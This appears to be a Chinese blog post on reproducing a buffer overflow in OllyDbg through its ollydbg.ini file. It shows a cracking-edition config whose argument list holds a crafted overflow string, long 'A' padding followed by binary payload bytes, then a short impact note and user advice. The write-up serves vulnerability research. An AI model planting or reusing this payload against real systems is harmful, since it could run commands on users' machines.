Scheme name[5]=No highlighting
Commands[0]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
Operands[0]=0,0,0,0,0,0,0,0,0,0,0,0,0,0
Scheme name[0]=No highlighting
[Arguments]
Executable[1]=
Executable[2]=
Executable[3]=
Executable[4]=
Executable[5]=
Executable[0]=
[Appearance]
CPU scheme=3
CPU Disassembler=2,3,0,0,3
CPU Dump=2,3,1,0,4353,0
CPU Stack=2,3,0,0
CPU Info=2,3,0,0
CPU Registers=2,3,1,0
超级字串参考=1,0,1,0,0
Executable modules=1,0,1,0,0
Memory map=1,0,1,0,0
Log data=1,0,1,0,0
Threads=1,0,1,0,0
Windows=1,0,1,0,0
Handles=1,0,1,0,0
Patches=1,0,1,0,0
Call stack=1,0,1,0,0
Source=1,0,0,0,0
References=1,0,1,0,0
Breakpoints=1,0,1,0,0
中文搜索引擎=1,0,1,0,0
Call tree=1,0,1,0,0
脚本运行窗口=1,0,1,0,0
Watch expressions=1,0,1,0,0
Source files=1,0,1,0,0
Run trace=1,0,1,0,0
SEH chain=1,0,1,0,0
[Columns]
CPU Disassembler=72,136,320,2048
CPU Dump=72,384,136,
CPU Stack=72,80,2048,
超级字串参考=54,240,1536
Executable modules=54,54,54,54,223,1536
Memory map=54,54,54,54,72,30,48,48,1536
Log data=54,1536
Threads=54,54,66,108,60,54,72,72
Windows=78,192,54,54,54,54,54,54,54,1536
Handles=54,90,36,54,18,72,1536
Patches=54,30,48,192,192,1536
Call stack=54,54,216,168,54
Source=48,1536
References=54,240,1536
Breakpoints=54,54,150,216,1536
中文搜索引擎=54,240,1536
Call tree=192,192,192,192
脚本运行窗口=30,240,90,54,600
Watch expressions=216,1536
Source files=54,96,1536
Run trace=54,54,54,54,192,1536
SEH chain=54,192
[Plugin StrongOD]
CreateProcessMode=0
HidePEB=1
IsPatchFloat=1
IsAdvGoto=0
KernelMode=1
KillPEBug=1
SuperEnumMod=1
AdvAttach=1
SkipExpection=1
OrdFirst=0
BreakOnLdr=0
BreakOnTls=1
RemoveEpOneShot=1
ShowBar=17
LoadSym=0
AutoUpdate=0
HideWindow=1
HideProcess=1
ProtectProcess=1
DriverKey=-514523012
DriverName=Rockey5U
UpdateURL=
[Plugin 中文搜索引擎]
Restore UStrRef Window=1
[Import libraries]
Implib[0]=C:\吾爱破解专用版Ollydbg\LIB\MFC42.Lib
Implib[1]=C:\吾爱破解专用版Ollydbg\LIB\mfc42d.lib
Implib[2]=C:\吾爱破解专用版Ollydbg\LIB\mfc42u.lib
Implib[3]=C:\吾爱破解专用版Ollydbg\LIB\mfc42ud.lib
Implib[4]=C:\吾爱破解专用版Ollydbg\LIB\mfc71.Lib
Implib[5]=C:\吾爱破解专用版Ollydbg\LIB\mfc71d.lib
Implib[6]=C:\吾爱破解专用版Ollydbg\LIB\mfc71u.lib
Implib[7]=C:\吾爱破解专用版Ollydbg\LIB\mfc71ud.lib
Implib[8]=C:\吾爱破解专用版Ollydbg\LIB\mfc80.lib
Implib[9]=C:\吾爱破解专用版Ollydbg\LIB\mfc80d.lib
Implib[10]=C:\吾爱破解专用版Ollydbg\LIB\mfc80u.lib
Implib[11]=C:\吾爱破解专用版Ollydbg\LIB\mfc80ud.lib
Implib[12]=C:\吾爱破解专用版Ollydbg\LIB\mfcd42d.lib
Implib[13]=C:\吾爱破解专用版Ollydbg\LIB\mfcd42ud.lib
Implib[14]=C:\吾爱破解专用版Ollydbg\LIB\mfcn42d.lib
Implib[15]=C:\吾爱破解专用版Ollydbg\LIB\mfcn42ud.lib
Implib[16]=C:\吾爱破解专用版Ollydbg\LIB\mfco42d.lib
Implib[17]=C:\吾爱破解专用版Ollydbg\LIB\mfco42ud.lib
Implib[18]=C:\吾爱破解专用版Ollydbg\LIB\MSVBVM50.lib
Implib[19]=C:\吾爱破解专用版Ollydbg\LIB\msvbvm60.lib
Implib[20]=C:\吾爱破解专用版Ollydbg\LIB\msvcp60.lib
Implib[21]=C:\吾爱破解专用版Ollydbg\LIB\msvcp71.lib
Implib[22]=C:\吾爱破解专用版Ollydbg\LIB\msvcp80.lib
Implib[23]=C:\吾爱破解专用版Ollydbg\LIB\MSVCR70.lib
Implib[24]=C:\吾爱破解专用版Ollydbg\LIB\msvcr71.lib
Implib[25]=C:\吾爱破解专用版Ollydbg\LIB\msvcr80.lib
Implib[26]=C:\吾爱破解专用版Ollydbg\LIB\msvcrt.lib
Implib[27]=C:\吾爱破解专用版Ollydbg\LIB\comctl32.lib
Implib[28]=C:\吾爱破解专用版Ollydbg\LIB\dbgeng.lib
Implib[29]=C:\吾爱破解专用版Ollydbg\LIB\dbghelp.lib
Implib[30]=C:\吾爱破解专用版Ollydbg\LIB\kernel32.lib
Implib[31]=C:\吾爱破解专用版Ollydbg\LIB\ntdll.lib
Implib[32]=C:\吾爱破解专用版Ollydbg\LIB\oleaut32.lib
Implib[33]=C:\吾爱破解专用版Ollydbg\LIB\oledlg.lib
Implib[34]=C:\吾爱破解专用版Ollydbg\LIB\ollydbg.lib
Implib[35]=C:\吾爱破解专用版Ollydbg\LIB\ws2_32.lib
Implib[36]=C:\吾爱破解专用版Ollydbg\LIB\wsock32.lib
[Plugin ILLY]
AutoRun=0
[参数]
参数[0]=123123
参数[1]=""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo\CAAAAAAAAAAAAAAAA谏浸鐜_賢$鬪)杀11n冾?n?{ｚH刓?顾lj蓒]鵁w?Zy;パ_r6I?磹瘐匷髀囦蘙Zg砚??翗蒳?HC/糠蹠i?9T'證悘6桁礎/廰谴7??夷僲既《魺D}踒??鋫n3鰉螒|?ㄞ哨>e枯@f锏q韅翇$?l??d蒖<睮W糀Q?瘴?梆`憭绯y{??""
Argument[1]=1
Argument[0]=123123
[Exceptions]
Custom[0]=00000000,FFFFFFFF

漏洞影响

在 win7 以上的系统使用 OD 之前需要允许 UAC，似乎可以使用漏洞基于调试器绕过 UAC 执行任意命令。

但是综合来看触发漏洞的条件较为苛刻，总体利用价值不算特别高。

平时使用 OD 的时候尽量不要使用参数功能，必须使用的时候先点击下拉菜单看看有没有特别奇怪的参数。

Catalpa's Site

OllyDBG ollydbg.ini 缓冲区溢出漏洞复现

漏洞信息

漏洞复现

漏洞分析

漏洞影响